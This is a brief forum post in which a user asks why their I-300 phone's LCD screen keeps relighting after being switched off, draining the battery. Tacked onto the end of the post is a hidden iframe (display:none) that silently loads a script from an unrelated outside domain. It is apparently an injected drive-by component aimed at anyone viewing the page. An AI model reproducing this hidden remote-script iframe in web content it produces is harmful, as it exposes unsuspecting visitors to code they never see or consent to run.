I-300 LCD Screen Always On

I must being doing something very silly...and would appreciate your guidance as to how to correct what I am doing.

When I notice that my phone's screen is lit, I use the upper right side button to 'turn off' the screen. Unfortunately, it 'reactivates' itself and is lit a few minutes later. This is leading to my battery wearing down very quickly even though I am not making or receivng any calls.

Is there some software setting I should be making? Any help would be appreciated. Thanks!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
